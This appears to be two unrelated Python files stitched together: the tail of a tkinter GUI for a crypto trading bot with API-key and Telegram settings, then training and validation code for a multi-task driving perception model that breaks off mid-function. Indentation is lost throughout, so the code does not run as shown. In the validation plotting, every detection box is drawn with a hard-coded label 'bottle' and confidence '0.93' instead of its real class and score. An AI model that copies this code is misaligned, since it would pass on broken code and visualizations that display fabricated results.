homeFrame = tk.Frame(root, bg=BACKGROUND)
runFrame = tk.Frame(root, bg=BACKGROUND)
settingsFrame = tk.Frame(root, bg=BACKGROUND)
aboutFrame = tk.Frame(root,bg=BACKGROUND)
historyFrame = tk.Frame(root,bg=BACKGROUND)
notificationFrame = tk.Frame(root, bg=BACKGROUND)
botOptionsFrame = tk.Frame(root, bg=BACKGROUND)
homeBtn = tk.Button(root, text="Home", padx=BTNPADX_S, pady=5, highlightbackground=BTNFRAMEBG, fg=BTNCLICKEDFG, bg=BTNCLICKEDBG, height=1, width=4, command=openHome, relief=FLAT)
runBtn = tk.Button(root, text="Run", padx=BTNPADX_S, pady=5, highlightbackground=BTNFRAMEBG, fg=BTNFG, bg=BTNBG, height=1, width=4, command=openRun, relief=FLAT)
settingsBtn = tk.Button(root, text="Strategy", padx=BTNPADX_S, pady=5, highlightbackground=BTNFRAMEBG, fg=BTNFG, bg=BTNBG, height=1, width=4, command=openSettings, relief=FLAT)
historyBtn = tk.Button(root, text="History", padx=BTNPADX_S, pady=5, highlightbackground=BTNFRAMEBG, fg=BTNFG, bg=BTNBG, height=1, width=4, command=openHistory, relief=FLAT)
botOptionBtn = tk.Button(root, text="Settings", padx=BTNPADX_M, pady=5, highlightbackground=BTNFRAMEBG, fg=BTNFG, bg=BTNBG, height=1, width=4, command=openOptions, relief=FLAT)
aboutBtn = tk.Button(root, text="About", padx=BTNPADX_S, pady=5, highlightbackground=BTNFRAMEBG, fg=BTNFG, bg=BTNBG, height=1, width=4, command=openAbout, relief=FLAT)
exchangeBtn = tk.Button(root, text="Extras", padx=BTNPADX_L, pady=5, highlightbackground=BTNFRAMEBG, fg="white", bg="#663399", height=1, width=4, command=openAbout, relief=FLAT)
#Define Home page UI elements
homeInfo = tk.Text(homeFrame, relief=FLAT, fg=FOREGROUND, bg=BACKGROUND, height=24, width=47)
homeInfo.pack()
homeInfo.insert(tk.END, "\nSimplicity COSS Bot - Version 1.0\n\nTo get started please first customize your bot\nfrom the strategy tab. You can also enable\ntelegram messaging from the settings tab.")
homeInfo.insert(tk.END, "\n\nOnce configured you can run the bot from the\nrun tab")
homeInfo.insert(tk.END, "\n\nLatest Updates (1/5/2020)\n---------------------------\n - New simplified strategy UI!\n - Added auto calculation of start/sell prices\n - Added auto calculation of stop prices\n - Optional price adjustments on run page\n - Changed default starting pair\n - Code cleanup and bug fixes")
homeInfo.insert(tk.END, "\n\nTrading is very risky, the use of this tool may\nresult in significant losses")
homeInfo.insert(tk.END, "\n\nTo protect your primary COSS account, always\ncreate a second account for use with public\ntrading bots.")
homeInfo.config(state="disabled")
if os.name == "nt":
cossPhoto = ImageTk.PhotoImage(Image.open("coss2.png"))
cossPhotoLabel = tk.Label(homeFrame,text="image",image=cossPhoto, bg=BACKGROUND)
cossPhotoLabel.pack()
else:
print("Images not supported in this OS")
#Define Settings page UI elements
tk.Label(settingsFrame, text="", bg=BACKGROUND).grid(row=0)
publicLabel = tk.Label(settingsFrame, text=" Public API Key")
publicLabel.config(relief=FLAT, bg=BACKGROUND, fg=FOREGROUND)
publicLabel.grid(row=1, sticky="W")
publicAPIKeyBox = tk.Entry(settingsFrame, show="*", width=46)
publicAPIKeyBox.grid(row=1, column=1)
privateLabel = tk.Label(settingsFrame, text=" Private API Key")
privateLabel.config(relief=FLAT, bg=BACKGROUND, fg=FOREGROUND)
privateLabel.grid(row=2, sticky="W")
privateAPIKeyBox = tk.Entry(settingsFrame, show="*", width=46)
privateAPIKeyBox.grid(row=2, column=1)
#tk.Label(settingsFrame, text="", bg=BACKGROUND).grid(row=3)
tradingPairText = tk.Label(settingsFrame, text=" Quote Pair")
tradingPairText.config(relief=FLAT, bg=BACKGROUND, fg=FOREGROUND)
tradingPairText.grid(row=3, column=0, sticky="W")
quotePairOptions = [
"ETH",
"BTC",
"COS",
"USDT",
"DAI",
"USD",
"EUR"
]
quotePair = StringVar(settingsFrame)
quotePair.set(quotePairOptions[0])
quoteMenu = OptionMenu(*(settingsFrame, quotePair) + tuple(quotePairOptions), command=quotePairChanged)
quoteMenu.config(bg=BACKGROUND, fg=FOREGROUND, relief=FLAT)
quoteMenu["menu"].config(bg=BACKGROUND, fg=FOREGROUND, relief=FLAT)
quoteMenu["highlightthickness"]=0
quoteMenu.grid(row=3, column=1)
tradingPairText = tk.Label(settingsFrame, text=" Trade Pair")
tradingPairText.config(relief=FLAT, bg=BACKGROUND, fg=FOREGROUND)
tradingPairText.grid(row=4, column=0, sticky="W")
tradingPairOptions = [
"Temp",
"Temp2"
]
tradingPair = StringVar(settingsFrame)
tradingPair.set("temp") # initial value
pairMenu = OptionMenu(*(settingsFrame, tradingPair) + tuple(tradingPairOptions), command=tradingPairChanged)
pairMenu.config(bg=BACKGROUND, fg=FOREGROUND, relief=FLAT)
pairMenu["menu"].config(bg=BACKGROUND, fg=FOREGROUND, relief=FLAT)
pairMenu["highlightthickness"]=0
pairMenu.grid(row=4, column=1)
tradingStratText = tk.Label(settingsFrame, text=" Trading Strategy")
tradingStratText.config(relief=FLAT, bg=BACKGROUND, fg=FOREGROUND)
tradingStratText.grid(row=5, column=0, sticky="W")
tradingStratOptions = [
"GRID MM",
"Buy Low Sell High"
]
tradingStrat = StringVar(settingsFrame)
tradingStrat.set(tradingStratOptions[0]) # initial value
stratMenu = OptionMenu(*(settingsFrame, tradingStrat) + tuple(tradingStratOptions), command=stratMenuChanged)
stratMenu.config(bg=BACKGROUND, fg=FOREGROUND, relief=FLAT)
stratMenu["menu"].config(bg=BACKGROUND, fg=FOREGROUND, relief=FLAT)
stratMenu["highlightthickness"]=0
stratMenu.grid(row=5, column=1)
#Define bottom frame for Settings page apply button
saveStratFrame = tk.Frame(settingsFrame, bg=BACKGROUND)
saveStratFrame.place(relwidth=FRAMEWIDTH*1.25, relheight=FRAMEHEIGHT/6.5, relx=0, rely=FRAMEPADY*7.2)
saveBtn = tk.Button(saveStratFrame, text="Save", padx=10, pady=5, highlightbackground=BACKGROUND, fg=BTNFG, bg=BTNBG, height=1, width=4, command=saveStrategy, relief=FLAT)
saveBtn.pack()
#tk.Label(saveStratFrame, text="This strategy is not yet implemented", bg="#482923", fg=FOREGROUND).pack()
#Define UI elements for Buy Low Sell High Strategy Frame
blStratFrame = tk.Frame(root, bg="#482923")
tk.Label(blStratFrame, text="This strategy is not yet implemented", bg="#482923", fg=FOREGROUND).pack()
#Define UI elements for GRID Strategy Frame
gridStratFrame = tk.Frame(root, bg="#182923")
tk.Label(gridStratFrame, text=" ", bg="#182923").grid(row=0, column=1)
currentPriceLabel = tk.Label(gridStratFrame, text=" Current Price (" + quotePair.get() + ")")
currentPriceLabel.config(relief=FLAT, bg="#182923", fg=FOREGROUND)
currentPriceLabel.grid(row=1, column=0, sticky="W")
currentPriceBox = tk.Text(gridStratFrame, width=12, height=1)
currentPriceBox.insert(tk.END, "2.67")
currentPriceBox.config(state="disabled", bg="#182923", fg=FOREGROUND)
currentPriceBox.grid(row=1, column=2)
tk.Label(gridStratFrame, text=" ", bg="#182923").grid(row=2, column=1)
tk.Label(gridStratFrame, text="Available Balances", bg="#182923", fg=FOREGROUND, font='Helvetica 8 bold').grid(row=3, column=1)
tradePairBalanceLabel = tk.Label(gridStratFrame, text=" Trade Balance (" + tradingPair.get() + ")")
tradePairBalanceLabel.config(relief=FLAT, bg="#182923", fg=FOREGROUND)
tradePairBalanceLabel.grid(row=4, column=0, sticky="W")
tradePairBalanceBox = tk.Text(gridStratFrame, width=12, height=1)
tradePairBalanceBox.insert(tk.END, "30000")
tradePairBalanceBox.config(state="disabled", bg="#182923", fg=FOREGROUND)
tradePairBalanceBox.grid(row=4, column=2)
quotePairBalanceLabel = tk.Label(gridStratFrame, text=" Quote Balance (" + quotePair.get() + ")")
quotePairBalanceLabel.config(relief=FLAT, bg="#182923", fg=FOREGROUND)
quotePairBalanceLabel.grid(row=5, column=0, sticky="W")
quotePairBalanceBox = tk.Text(gridStratFrame, width=12, height=1)
quotePairBalanceBox.insert(tk.END, "2.67")
quotePairBalanceBox.config(state="disabled", bg="#182923", fg=FOREGROUND)
quotePairBalanceBox.grid(row=5, column=2)
tk.Label(gridStratFrame, text=" ", bg="#182923").grid(row=6, column=1)
tk.Label(gridStratFrame, text="Grid Settings", bg="#182923", fg=FOREGROUND, font='Helvetica 8 bold').grid(row=7, column=1)
orderSizeLabel = tk.Label(gridStratFrame, text=" Order Size (" + tradingPair.get() + ")")
orderSizeLabel.config(relief=FLAT, bg="#182923", fg=FOREGROUND)
orderSizeLabel.grid(row=8, column=0, sticky="W")
orderSizeBox = tk.Text(gridStratFrame, width=12, height=1)
orderSizeBox.insert(tk.END, "0.015")
orderSizeBox.config(bg="white", fg="black")
orderSizeBox.grid(row=8, column=2)
gridDistanceLabel = tk.Label(gridStratFrame, text=" Grid Distance (" + quotePair.get() + ")")
gridDistanceLabel.config(relief=FLAT, bg="#182923", fg=FOREGROUND)
gridDistanceLabel.grid(row=9, column=0, sticky="W")
gridDistanceBox = tk.Text(gridStratFrame, width=12, height=1)
gridDistanceBox.insert(tk.END, "0.000001")
gridDistanceBox.config(bg="white", fg="black")
gridDistanceBox.grid(row=9, column=2)
gridNumberLabel = tk.Label(gridStratFrame, text="\n Number Of Grids")
gridNumberLabel.config(relief=FLAT, bg="#182923", fg=FOREGROUND)
gridNumberLabel.grid(row=10, column=0, sticky="W")
numberOfGrids = Scale(gridStratFrame, from_=2, to=500, resolution=2, orient=HORIZONTAL, bg="#182923", fg=FOREGROUND, relief=FLAT, length=210)
numberOfGrids["highlightthickness"]=0
numberOfGrids.grid(row=10, column=1, columnspan=2)
#Define Run page UI elements
tk.Label(runFrame, text="", bg=BACKGROUND).grid(row=0, column=1)
runStrategyLabel = tk.Label(runFrame, text=" Selected Trading Strategy:")
runStrategyLabel.config(relief=FLAT, bg=BACKGROUND, fg=FOREGROUND)
runStrategyLabel.grid(row=1, column=0, sticky="W")
runStrategyBox = tk.Text(runFrame, width=12, height=1)
runStrategyBox.config(state="disabled", bg=BACKGROUND, fg=FOREGROUND)
runStrategyBox.grid(row=1, column=2, sticky="W")
runTradePairLabel = tk.Label(runFrame, text=" Selected Trading Pair:")
runTradePairLabel.config(relief=FLAT, bg=BACKGROUND, fg=FOREGROUND)
runTradePairLabel.grid(row=2, column=0, sticky="W")
runTradePairBox = tk.Text(runFrame, width=12, height=1)
runTradePairBox.config(state="disabled", bg=BACKGROUND, fg=FOREGROUND)
runTradePairBox.grid(row=2, column=2, sticky="W")
quoteBalanceUseLabel = tk.Label(runFrame, text=" Amount of " + quotePair.get() + " needed:")
quoteBalanceUseLabel.config(relief=FLAT, bg=BACKGROUND, fg=FOREGROUND)
quoteBalanceUseLabel.grid(row=3, column=0, sticky="W")
quoteBalanceUseBox = tk.Text(runFrame, width=12, height=1)
quoteBalanceUseBox.config(state="disabled", bg=BACKGROUND, fg=FOREGROUND)
quoteBalanceUseBox.grid(row=3, column=2, sticky="W")
tradeBalanceUseLabel = tk.Label(runFrame, text=" Amount of " + tradingPair.get() + " needed:")
tradeBalanceUseLabel.config(relief=FLAT, bg=BACKGROUND, fg=FOREGROUND)
tradeBalanceUseLabel.grid(row=4, column=0, sticky="W")
tradeBalanceUseBox = tk.Text(runFrame, width=12, height=1)
tradeBalanceUseBox.config(state="disabled", bg=BACKGROUND, fg=FOREGROUND)
tradeBalanceUseBox.grid(row=4, column=2, sticky="W")
startBuyLabel = tk.Label(runFrame, text=" Starting Buy Price (" + quotePair.get() + ")")
startBuyLabel.config(relief=FLAT, bg=BACKGROUND, fg=FOREGROUND)
startBuyLabel.grid(row=5, column=0, sticky="W")
startBuyBox = tk.Text(runFrame, width=12, height=1)
startBuyBox.insert(tk.END, "1")
startBuyBox.config(bg="white", fg="black")
startBuyBox.grid(row=5, column=2, sticky="W")
startSellLabel = tk.Label(runFrame, text=" Starting Sell Price (" + quotePair.get() + ")")
startSellLabel.config(relief=FLAT, bg=BACKGROUND, fg=FOREGROUND)
startSellLabel.grid(row=6, column=0, sticky="W")
startSellBox = tk.Text(runFrame, width=12, height=1)
startSellBox.insert(tk.END, "1")
startSellBox.config(bg="white", fg="black")
startSellBox.grid(row=6, column=2, sticky="W")
stopBuyLabel = tk.Label(runFrame, text=" Lowest Buy Price (" + quotePair.get() + ")")
stopBuyLabel.config(relief=FLAT, bg=BACKGROUND, fg=FOREGROUND)
stopBuyLabel.grid(row=7, column=0, sticky="W")
stopBuyBox = tk.Text(runFrame, width=12, height=1)
stopBuyBox.insert(tk.END, "1")
stopBuyBox.config(bg="white", fg="black")
stopBuyBox.grid(row=7, column=2, sticky="W")
stopSellLabel = tk.Label(runFrame, text=" Highest Sell Price (" + quotePair.get() + ")")
stopSellLabel.config(relief=FLAT, bg=BACKGROUND, fg=FOREGROUND)
stopSellLabel.grid(row=8, column=0, sticky="W")
stopSellBox = tk.Text(runFrame, width=12, height=1)
stopSellBox.insert(tk.END, "1")
stopSellBox.config(bg="white", fg="black")
stopSellBox.grid(row=8, column=2, sticky="W")
runInstanceNameLabel = tk.Label(runFrame, text=" Name of Bot Instance:")
runInstanceNameLabel.config(relief=FLAT, bg=BACKGROUND, fg=FOREGROUND)
runInstanceNameLabel.grid(row=9, column=0, sticky="W")
runInstanceNameBox = tk.Text(runFrame, width=20, height=1)
runInstanceNameBox.config(state="normal", bg="white", fg="black")
runInstanceNameBox.grid(row=9, column=2, columnspan=2)
#Define bottom frame for run page start button
startRunFrame = tk.Frame(runFrame, bg=BACKGROUND)
startRunFrame.place(relwidth=FRAMEWIDTH*1.25, relheight=FRAMEHEIGHT/6.5, relx=0, rely=FRAMEPADY*7.2)
startBtn = tk.Button(startRunFrame, text="Start", padx=10, pady=5, highlightbackground=BACKGROUND, fg=BTNFG, bg=BTNBG, height=1, width=4, command=startStrategy, relief=FLAT)
startBtn.pack()
#Define Options page UI elements
tk.Label(botOptionsFrame, text=" ", bg=BACKGROUND).grid(row=0, column=1)
telegramVar = tk.IntVar()
enableTelegramChk = tk.Checkbutton(botOptionsFrame, text="Telegram", variable=telegramVar, command=telegramCheckBoxChanged)
enableTelegramChk.config(bg=BACKGROUND, fg="red")
enableTelegramChk.grid(row=1, sticky="W")
testMessage_withArg = partial(sendTelegramMessage, "This is a test!", True)
testTelegramBtn = tk.Button(botOptionsFrame, text="Test and Save", padx=35, highlightbackground=BTNFRAMEBG, fg="white", bg="#082923", height=1, width=4, command=testMessage_withArg, relief=FLAT)
testTelegramBtn.grid(row=1, column=2)
tokenLabel = tk.Label(botOptionsFrame, text=" Bot Token")
tokenLabel.config(relief=FLAT, bg=BACKGROUND, fg=FOREGROUND)
tokenLabel.grid(row=2, sticky="W")
tokenBox = tk.Entry(botOptionsFrame, width=46)
tokenBox.grid(row=2, column=2)
chatIDLabel = tk.Label(botOptionsFrame, text=" Bot Chat ID")
chatIDLabel.config(relief=FLAT, bg=BACKGROUND, fg=FOREGROUND)
chatIDLabel.grid(row=3, sticky="W")
chatIDBox = tk.Entry(botOptionsFrame, width=46)
chatIDBox.grid(row=3, column=2)
#Define About page UI elements
aboutInfo = tk.Text(aboutFrame, relief=FLAT, fg=FOREGROUND, bg=BACKGROUND, height=24, width=47)
aboutInfo.pack()
aboutInfo.insert(tk.END, "\nBot created by Omer \nTelegram: @omer259\nReddit: https://www.reddit.com/user/Omer259/")
aboutInfo.insert(tk.END, "\n\nBitcoin Donation Address: \nbc1qnjcnhcex50659vxnuhdkuzhhu4m0ewmx6p43j2")
aboutInfo.insert(tk.END, "\n\nEthereum Donation Address: \n0xE9b79A87520DFB16824d9AfC40a7d8bC1a81a753")
aboutInfo.insert(tk.END, "\n\nAll trading performed using this bot is\nat your own risk. I will not be held\nresponsible for any gains or losses caused by\nthe use of this tool")
aboutInfo.config(state="disabled")
#Define History page UI elements
scroll = Scrollbar(historyFrame)
scroll.grid(row=1, column=2, sticky="W", ipady=191.70)
tk.Label(historyFrame, text="", bg=BACKGROUND).grid(row=0, column=0)
historyTextField = tk.Text(historyFrame, bg=BACKGROUND, fg=FOREGROUND, yscrollcommand=scroll.set, width=HISTORYWIDTH, height=HISTORYHEIGHT)
historyTextField.grid(row=1, column=1, sticky="W")
scroll.config(command=historyTextField.yview)
#Define bottom frame for history page cancel button
cancelOrderFrame = tk.Frame(historyFrame, bg=BACKGROUND)
cancelOrderFrame.place(relwidth=FRAMEWIDTH*1.25, relheight=FRAMEHEIGHT/6.5, relx=0, rely=FRAMEPADY*7.2)
cancelOrderBtn = tk.Button(cancelOrderFrame, text="Cancel Orders and Stop", padx=10, pady=4, highlightbackground=BACKGROUND, fg=BTNFG, bg=BTNBG, height=1, width=18, command=cancelAllOrders, relief=FLAT)
cancelOrderBtn.pack()
#Setup UI elements
root.winfo_toplevel().title("Simplicity")
if os.name == "nt":
root.iconbitmap('coss.ico')
else:
print("Icons not supported in this OS")
canvas.pack()
btnFrame.place(relwidth=0.8, relheight=0.05, relx=0.1, rely=0.075)
homeFrame.place(relwidth=FRAMEWIDTH, relheight=FRAMEHEIGHT, relx=FRAMEPADX, rely=FRAMEPADY)
homeBtn.pack(in_=btnFrame, side=LEFT)
homeBtn.config(bg=BTNCLICKEDBG)
runBtn.pack(in_=btnFrame, side=LEFT)
settingsBtn.pack(in_=btnFrame, side=LEFT)
historyBtn.pack(in_=btnFrame, side=LEFT)
botOptionBtn.pack(in_=btnFrame, side=LEFT)
aboutBtn.pack(in_=btnFrame, side=LEFT)
exchangeBtn.config(state="disabled")
exchangeBtn.pack(in_=btnFrame, side=LEFT)
if telegramVar.get() == 0:
testTelegramBtn.config(state="disabled")
tokenBox.config(state="disabled")
chatIDBox.config(state="disabled")
#If telegram is enabled, alert user that bot was started
initializeBot()
#Start concurrent threads
historyRefreshThread = threading.Thread(target=historyReresh)
historyRefreshThread.daemon = True
historyRefreshThread.start()
root.mainloop()
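#Note: tkinter widgets are not thread-safe, so background threads such as the
#history refresh thread above should not touch widgets directly. A minimal
#sketch (assuming a hypothetical updateQueue and the stdlib queue module
#imported in this script) is to push strings from the worker onto a
#queue.Queue and drain it on the UI thread via root.after():
#
# def drainUpdateQueue():
#     try:
#         while True:
#             line = updateQueue.get_nowait()
#             historyTextField.insert(tk.END, line)
#     except queue.Empty:
#         pass
#     root.after(250, drainUpdateQueue)  # re-poll every 250 ms on the UI thread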
|
function.py
|
import time
from lib.core.evaluate import ConfusionMatrix,SegmentationMetric
from lib.core.general import non_max_suppression,check_img_size,scale_coords,xyxy2xywh,xywh2xyxy,box_iou,coco80_to_coco91_class,plot_images,ap_per_class,output_to_target
from lib.utils.utils import time_synchronized
from lib.utils import plot_img_and_mask,plot_one_box,show_seg_result
import torch
from threading import Thread
import numpy as np
from PIL import Image
from torchvision import transforms
from pathlib import Path
import json
import random
import cv2
import os
import math
from torch.cuda import amp
from tqdm import tqdm
def train(cfg, train_loader, model, criterion, optimizer, scaler, epoch, num_batch, num_warmup,
writer_dict, logger, device, rank=-1):
"""
train for one epoch
Inputs:
- config: configurations
- train_loader: loder for data
- model:
- criterion: (function) calculate all the loss, return total_loss, head_losses
- writer_dict:
outputs(2,)
output[0] len:3, [1,3,32,32,85], [1,3,16,16,85], [1,3,8,8,85]
output[1] len:1, [2,256,256]
output[2] len:1, [2,256,256]
target(2,)
target[0] [1,n,5]
target[1] [2,256,256]
target[2] [2,256,256]
Returns:
None
"""
batch_time = AverageMeter()
data_time = AverageMeter()
losses = AverageMeter()
# switch to train mode
model.train()
start = time.time()
for i, (input, target, paths, shapes) in enumerate(train_loader):
intermediate = time.time()
#print('tims:{}'.format(intermediate-start))
num_iter = i + num_batch * (epoch - 1)
if num_iter < num_warmup:
# warm up
lf = lambda x: ((1 + math.cos(x * math.pi / cfg.TRAIN.END_EPOCH)) / 2) * \
(1 - cfg.TRAIN.LRF) + cfg.TRAIN.LRF # cosine
xi = [0, num_warmup]
# model.gr = np.interp(ni, xi, [0.0, 1.0]) # iou loss ratio (obj_loss = 1.0 or iou)
for j, x in enumerate(optimizer.param_groups):
# bias lr falls from 0.1 to lr0, all other lrs rise from 0.0 to lr0
x['lr'] = np.interp(num_iter, xi, [cfg.TRAIN.WARMUP_BIASE_LR if j == 2 else 0.0, x['initial_lr'] * lf(epoch)])
if 'momentum' in x:
x['momentum'] = np.interp(num_iter, xi, [cfg.TRAIN.WARMUP_MOMENTUM, cfg.TRAIN.MOMENTUM])
data_time.update(time.time() - start)
if not cfg.DEBUG:
input = input.to(device, non_blocking=True)
assign_target = []
for tgt in target:
assign_target.append(tgt.to(device))
target = assign_target
with amp.autocast(enabled=device.type != 'cpu'):
outputs = model(input)
total_loss, head_losses = criterion(outputs, target, shapes,model)
# print(head_losses)
# compute gradient and do update step
optimizer.zero_grad()
scaler.scale(total_loss).backward()
scaler.step(optimizer)
scaler.update()
if rank in [-1, 0]:
# measure accuracy and record loss
losses.update(total_loss.item(), input.size(0))
# _, avg_acc, cnt, pred = accuracy(output.detach().cpu().numpy(),
# target.detach().cpu().numpy())
# acc.update(avg_acc, cnt)
# measure elapsed time
batch_time.update(time.time() - start)
end = time.time()
if i % cfg.PRINT_FREQ == 0:
msg = 'Epoch: [{0}][{1}/{2}]\t' \
'Time {batch_time.val:.3f}s ({batch_time.avg:.3f}s)\t' \
'Speed {speed:.1f} samples/s\t' \
'Data {data_time.val:.3f}s ({data_time.avg:.3f}s)\t' \
'Loss {loss.val:.5f} ({loss.avg:.5f})'.format(
epoch, i, len(train_loader), batch_time=batch_time,
speed=input.size(0)/batch_time.val,
data_time=data_time, loss=losses)
logger.info(msg)
writer = writer_dict['writer']
global_steps = writer_dict['train_global_steps']
writer.add_scalar('train_loss', losses.val, global_steps)
# writer.add_scalar('train_acc', acc.val, global_steps)
writer_dict['train_global_steps'] = global_steps + 1
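# A minimal sketch (illustrative only; not called elsewhere in this file) of
# the warm-up rule applied above: each parameter group's lr is linearly
# interpolated from its warm-up start value up to initial_lr * lf(epoch)
# over the first num_warmup iterations.
def _warmup_lr_sketch(num_iter, num_warmup, initial_lr, cosine_factor, warmup_start_lr=0.0):
    """Hypothetical helper mirroring the in-loop np.interp call."""
    return np.interp(num_iter, [0, num_warmup],
                     [warmup_start_lr, initial_lr * cosine_factor])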
def validate(epoch,config, val_loader, val_dataset, model, criterion, output_dir,
tb_log_dir, writer_dict=None, logger=None, device='cpu', rank=-1):
"""
validata
Inputs:
- config: configurations
- train_loader: loder for data
- model:
- criterion: (function) calculate all the loss, return
- writer_dict:
Return:
None
"""
# setting
max_stride = 32
weights = None
save_dir = output_dir + os.path.sep + 'visualization'
if not os.path.exists(save_dir):
os.mkdir(save_dir)
# print(save_dir)
_, imgsz = [check_img_size(x, s=max_stride) for x in config.MODEL.IMAGE_SIZE] #imgsz is multiple of max_stride
batch_size = config.TRAIN.BATCH_SIZE_PER_GPU * len(config.GPUS)
test_batch_size = config.TEST.BATCH_SIZE_PER_GPU * len(config.GPUS)
training = False
is_coco = False #is coco dataset
save_conf=False # save auto-label confidences
verbose=False
save_hybrid=False
log_imgs, wandb = min(16, 100), None  # cap on W&B image logging; wandb is bound below if importable
nc = 1
iouv = torch.linspace(0.5,0.95,10).to(device) #iou vector for mAP@0.5:0.95
niou = iouv.numel()
try:
import wandb
except ImportError:
wandb = None
log_imgs = 0
seen = 0
confusion_matrix = ConfusionMatrix(nc=model.nc) #detector confusion matrix
da_metric = SegmentationMetric(config.num_seg_class) #segment confusion matrix
ll_metric = SegmentationMetric(2) #segment confusion matrix
names = {k: v for k, v in enumerate(model.names if hasattr(model, 'names') else model.module.names)}
colors = [[random.randint(0, 255) for _ in range(3)] for _ in names]
coco91class = coco80_to_coco91_class()
s = ('%20s' + '%12s' * 6) % ('Class', 'Images', 'Targets', 'P', 'R', 'mAP@.5', 'mAP@.5:.95')
p, r, f1, mp, mr, map50, map, t_inf, t_nms = 0., 0., 0., 0., 0., 0., 0., 0., 0.
losses = AverageMeter()
da_acc_seg = AverageMeter()
da_IoU_seg = AverageMeter()
da_mIoU_seg = AverageMeter()
ll_acc_seg = AverageMeter()
ll_IoU_seg = AverageMeter()
ll_mIoU_seg = AverageMeter()
T_inf = AverageMeter()
T_nms = AverageMeter()
# switch to train mode
model.eval()
jdict, stats, ap, ap_class, wandb_images = [], [], [], [], []
for batch_i, (img, target, paths, shapes) in tqdm(enumerate(val_loader), total=len(val_loader)):
if not config.DEBUG:
img = img.to(device, non_blocking=True)
assign_target = []
for tgt in target:
assign_target.append(tgt.to(device))
target = assign_target
nb, _, height, width = img.shape #batch size, channel, height, width
with torch.no_grad():
pad_w, pad_h = shapes[0][1][1]
pad_w = int(pad_w)
pad_h = int(pad_h)
ratio = shapes[0][1][0][0]
t = time_synchronized()
det_out, da_seg_out, ll_seg_out= model(img)
t_inf = time_synchronized() - t
if batch_i > 0:
T_inf.update(t_inf/img.size(0),img.size(0))
inf_out,train_out = det_out
#driving area segment evaluation
_,da_predict=torch.max(da_seg_out, 1)
_,da_gt=torch.max(target[1], 1)
da_predict = da_predict[:, pad_h:height-pad_h, pad_w:width-pad_w]
da_gt = da_gt[:, pad_h:height-pad_h, pad_w:width-pad_w]
da_metric.reset()
da_metric.addBatch(da_predict.cpu(), da_gt.cpu())
da_acc = da_metric.pixelAccuracy()
da_IoU = da_metric.IntersectionOverUnion()
da_mIoU = da_metric.meanIntersectionOverUnion()
da_acc_seg.update(da_acc,img.size(0))
da_IoU_seg.update(da_IoU,img.size(0))
da_mIoU_seg.update(da_mIoU,img.size(0))
#lane line segment evaluation
_,ll_predict=torch.max(ll_seg_out, 1)
_,ll_gt=torch.max(target[2], 1)
ll_predict = ll_predict[:, pad_h:height-pad_h, pad_w:width-pad_w]
ll_gt = ll_gt[:, pad_h:height-pad_h, pad_w:width-pad_w]
ll_metric.reset()
ll_metric.addBatch(ll_predict.cpu(), ll_gt.cpu())
ll_acc = ll_metric.lineAccuracy()
ll_IoU = ll_metric.IntersectionOverUnion()
ll_mIoU = ll_metric.meanIntersectionOverUnion()
ll_acc_seg.update(ll_acc,img.size(0))
ll_IoU_seg.update(ll_IoU,img.size(0))
ll_mIoU_seg.update(ll_mIoU,img.size(0))
total_loss, head_losses = criterion((train_out,da_seg_out, ll_seg_out), target, shapes,model) #Compute loss
losses.update(total_loss.item(), img.size(0))
#NMS
t = time_synchronized()
target[0][:, 2:] *= torch.Tensor([width, height, width, height]).to(device) # to pixels
lb = [target[0][target[0][:, 0] == i, 1:] for i in range(nb)] if save_hybrid else [] # for autolabelling
output = non_max_suppression(inf_out, conf_thres= config.TEST.NMS_CONF_THRESHOLD, iou_thres=config.TEST.NMS_IOU_THRESHOLD, labels=lb)
#output = non_max_suppression(inf_out, conf_thres=0.001, iou_thres=0.6)
#output = non_max_suppression(inf_out, conf_thres=config.TEST.NMS_CONF_THRES, iou_thres=config.TEST.NMS_IOU_THRES)
t_nms = time_synchronized() - t
if batch_i > 0:
T_nms.update(t_nms/img.size(0),img.size(0))
if config.TEST.PLOTS:
if batch_i == 0:
for i in range(test_batch_size):
if i>=len(paths): # skip padding when the last batch is smaller; to be removed later
break
img_test = cv2.imread(paths[i])
da_seg_mask = da_seg_out[i][:, pad_h:height-pad_h, pad_w:width-pad_w].unsqueeze(0)
da_seg_mask = torch.nn.functional.interpolate(da_seg_mask, scale_factor=int(1/ratio), mode='bilinear')
_, da_seg_mask = torch.max(da_seg_mask, 1)
da_gt_mask = target[1][i][:, pad_h:height-pad_h, pad_w:width-pad_w].unsqueeze(0)
da_gt_mask = torch.nn.functional.interpolate(da_gt_mask, scale_factor=int(1/ratio), mode='bilinear')
_, da_gt_mask = torch.max(da_gt_mask, 1)
da_seg_mask = da_seg_mask.int().squeeze().cpu().numpy()
da_gt_mask = da_gt_mask.int().squeeze().cpu().numpy()
# seg_mask = seg_mask > 0.5
# plot_img_and_mask(img_test, seg_mask, i,epoch,save_dir)
img_test1 = img_test.copy()
_ = show_seg_result(img_test, da_seg_mask, i,epoch,save_dir)
_ = show_seg_result(img_test1, da_gt_mask, i, epoch, save_dir, is_gt=True)
img_ll = cv2.imread(paths[i])
ll_seg_mask = ll_seg_out[i][:, pad_h:height-pad_h, pad_w:width-pad_w].unsqueeze(0)
ll_seg_mask = torch.nn.functional.interpolate(ll_seg_mask, scale_factor=int(1/ratio), mode='bilinear')
_, ll_seg_mask = torch.max(ll_seg_mask, 1)
ll_gt_mask = target[2][i][:, pad_h:height-pad_h, pad_w:width-pad_w].unsqueeze(0)
ll_gt_mask = torch.nn.functional.interpolate(ll_gt_mask, scale_factor=int(1/ratio), mode='bilinear')
_, ll_gt_mask = torch.max(ll_gt_mask, 1)
ll_seg_mask = ll_seg_mask.int().squeeze().cpu().numpy()
ll_gt_mask = ll_gt_mask.int().squeeze().cpu().numpy()
# seg_mask = seg_mask > 0.5
# plot_img_and_mask(img_test, seg_mask, i,epoch,save_dir)
img_ll1 = img_ll.copy()
_ = show_seg_result(img_ll, ll_seg_mask, i,epoch,save_dir, is_ll=True)
_ = show_seg_result(img_ll1, ll_gt_mask, i, epoch, save_dir, is_ll=True, is_gt=True)
img_det = cv2.imread(paths[i])
img_gt = img_det.copy()
det = output[i].clone()
if len(det):
det[:,:4] = scale_coords(img[i].shape[1:],det[:,:4],img_det.shape).round()
for *xyxy,conf,cls in reversed(det):
label = 'bottle'  # hard-coded single-class label used for visualization
c = '0.93'        # hard-coded confidence string shown in the plot
label_det_pred = f'{label} {c}'
plot_one_box(xyxy, img_det , label=label_det_pred, color=colors[int(cls)], line_thickness=3)
if epoch % 1==0:
cv2.imwrite(save_dir+"/batch_{}_{}_det_pred.png".format(epoch,i),img_det)
labels = target[0][target[0][:, 0] == i, 1:]
# print(labels)
labels[:,1:5]=xywh2xyxy(labels[:,1:5])
if len(labels):
